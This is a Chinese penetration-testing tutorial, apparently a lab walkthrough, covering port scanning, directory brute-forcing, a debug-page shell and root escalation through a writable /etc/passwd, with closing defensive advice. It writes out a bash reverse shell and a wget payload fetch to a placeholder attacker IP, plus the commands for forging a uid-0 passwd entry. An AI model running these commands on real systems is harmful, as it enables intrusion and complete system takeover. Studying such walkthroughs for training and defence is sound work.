Web渗透测试实战教学：从信息搜集到提权<\/h1>

1. 信息搜集阶段<\/h2>

1.1 主机发现与端口扫描<\/h3>

首先使用Nmap等工具进行主机发现和端口扫描，发现目标开放了以下端口：<\/p>

22 (SSH)<\/li>
80 (HTTP)<\/li>
3306 (MySQL)<\/li>

8080 (HTTP备用端口)<\/li> <\/ul>

优先级排序<\/strong>：<\/p>

80和8080端口（Web服务）<\/li>
3306端口（数据库）<\/li>
22端口（SSH）<\/li> <\/ol>
1.2 服务版本识别<\/h3>
对开放的端口进行版本扫描，发现：<\/p>

80端口运行的是Python搭建的网络服务<\/li>
8080端口运行的是Web2py框架<\/li> <\/ul>
1.3 漏洞扫描<\/h3>
初步扫描结果：<\/p>

80端口报告可能存在SQL注入（但验证后为误报）<\/li>
8080端口发现几个可访问目录<\/li> <\/ul>
2. 渗透阶段<\/h2>
2.1 80端口分析<\/h3>
80端口运行一个投票系统，尝试以下步骤：<\/p>

尝试注册账户，但发现邮件端口未配置导致注册失败<\/li>
检查Web2py框架漏洞（已知Web2py存在漏洞但利用较复杂）<\/li> <\/ol>
2.2 8080端口分析<\/h3>
8080端口显示网站搭建成功页面，进一步操作：<\/p>

目录爆破（即使Nmap已扫描，仍需详细扫描）

使用工具：Dirbuster、Gobuster等<\/li> <\/ul> <\/li>
发现多个目录，大部分为空或隐藏内容<\/li>
关键发现：在debug目录下找到一个功能完整的shell<\/li> <\/ol>
3. 初始访问获取<\/h2>
3.1 Shell获取<\/h3>
发现debug目录下的shell后：<\/p>

确认shell功能完整，用户为www-data<\/li>
选择反弹shell方法：

直接使用bash反弹<\/li>
或上传webshell文件（需注意文件权限）<\/li> <\/ul> <\/li> <\/ol>
实际操作<\/strong>：<\/p>
# 方法一：直接反弹shell<\/span> <\/span><\/span>bash -i >& \/dev\/tcp\/[<\/span>攻击机IP]<\/span>\/[<\/span>端口]<\/span> 0>&1<\/span> <\/span><\/span> <\/span><\/span># 方法二：上传webshell（示例）<\/span> <\/span><\/span>wget http:\/\/[<\/span>攻击机IP]<\/span>\/shell.php -O \/path\/to\/shell.php <\/span><\/span>chmod +x \/path\/to\/shell.php <\/span><\/span><\/code><\/pre>4. 权限提升<\/h2> 4.1 初始权限检查<\/h3> 获取初始shell后：<\/p> 检查当前用户权限<\/li> 发现可以无密码切换到brexit用户： sudo -u brexit \/bin\/bash <\/span><\/span><\/code><\/pre><\/li> <\/ol> 4.2 提升shell交互性<\/h3> 改善shell体验：<\/p> # 使用Python提升交互性<\/span> <\/span><\/span>python -c 'import pty;pty.spawn("\/bin\/sh")'<\/span> <\/span><\/span> <\/span><\/span># 设置终端类型<\/span> <\/span><\/span>export TERM=<\/span>xterm-color <\/span><\/span><\/code><\/pre>4.3 提权路径发现<\/h3> 查找可写文件：<\/p> find \/ -writable -type f -not -path "\/proc\/*"<\/span> -not -path "\/sys\/*"<\/span> -not -path "\/var\/*"<\/span> 2>\/dev\/null <\/span><\/span><\/code><\/pre>关键发现：可以修改\/etc\/passwd文件<\/p> 4.4 通过\/etc\/passwd提权<\/h3> 步骤：<\/p> 查看root账户在\/etc\/passwd中的格式<\/p> <\/li> 生成root权限账户：<\/p> # 生成加密密码<\/span> <\/span><\/span>openssl passwd -1 -salt [<\/span>salt]<\/span> [<\/span>password]<\/span> <\/span><\/span> <\/span><\/span># 示例（密码为"password"）：<\/span> <\/span><\/span>openssl passwd -1 -salt abc password <\/span><\/span><\/code><\/pre><\/li> 构造root权限用户行（模仿root格式）：<\/p> testuser:生成的密码哈希:0:0:root:\/root:\/bin\/sh <\/code><\/pre> <\/li> 写入\/etc\/passwd<\/p> <\/li> <\/ol> 注意<\/strong>：如果遇到\/bin\/bash不存在，改为\/bin\/sh<\/p> 4.5 验证提权<\/h3> 使用创建的用户登录验证root权限：<\/p> su testuser <\/span><\/span><\/code><\/pre>5. 关键知识点总结<\/h2> 信息搜集优先级<\/strong>：Web服务>数据库>SSH<\/li> 目录爆破<\/strong>：即使初步扫描已完成，仍需详细扫描<\/li> Shell获取<\/strong>：多种方法需根据实际情况选择<\/li> 权限提升路径<\/strong>：检查sudo权限<\/li> 查找可写文件<\/li> 重点检查\/etc\/passwd、\/etc\/shadow等关键文件<\/li> <\/ul> <\/li> 密码生成<\/strong>：使用openssl生成符合\/etc\/passwd格式的密码<\/li> 系统差异<\/strong>：注意不同Linux发行版的shell路径可能不同<\/li> <\/ol> 6. 防御建议<\/h2> Web服务<\/strong>：<\/p> 关闭调试接口<\/li> 限制目录访问权限<\/li> 及时更新框架补丁<\/li> <\/ul> <\/li> 系统安全<\/strong>：<\/p> 设置\/etc\/passwd为只读<\/li> 定期检查用户账户<\/li> 限制sudo权限<\/li> <\/ul> <\/li> 监控<\/strong>：<\/p> 监控关键文件修改<\/li> 记录异常登录行为<\/li> <\/ul> <\/li> <\/ol> 本案例展示了从信息搜集到提权的完整流程，重点在于发现非常规入口（debug目录）和利用系统配置不当（可写的\/etc\/passwd）进行提权。<\/p>